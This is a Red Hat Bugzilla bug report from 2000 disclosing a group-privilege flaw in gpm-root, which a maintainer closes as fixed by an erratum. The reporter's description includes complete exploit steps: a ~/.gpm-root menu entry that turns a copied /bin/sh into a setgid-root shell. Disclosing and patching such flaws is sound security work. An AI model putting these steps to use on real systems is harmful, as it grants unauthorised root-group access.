Bug 10340

Summary: Exploit in gpm-root.
Product: [Retired] Red Hat Linux Reporter: zurk
Component: gpmAssignee: Preston Brown <pbrown>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: high    
Version: 6.1Keywords: Security
Target Milestone: ---   
Target Release: ---   
Hardware: All   
OS: Linux   
URL: http://securityfocus.com/vdb/bottom.html?section=exploit&vid=1069
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2000-05-08 20:47:29 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description zurk 2000-03-25 02:24:26 UTC
A vulnerability exists in the gpm-root program, part of the gpm package.
 This package is used to enable mice on the consoles of many popular
 Linux distributions. The problem is a design error, caused when a
 programmer chose to attempt to revert to the running users groups,
 after having called setuid to the users id already. The setgid call fails,
 and the process maintains the groups the gpm-root program is running
 as. This is usually the 'root' group.

Exploit :
cp /bin/sh /tmp
 create a .gpm-root file in ~ with the following:
 button 1 {
 name "create a setgid shell"
 "setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
 }

 click control-left mouse button, and click "setgid shell"
 execute /tmp/sh

Comment 1 Preston Brown 2000-05-08 20:47:59 UTC
this has been solved w/an errata.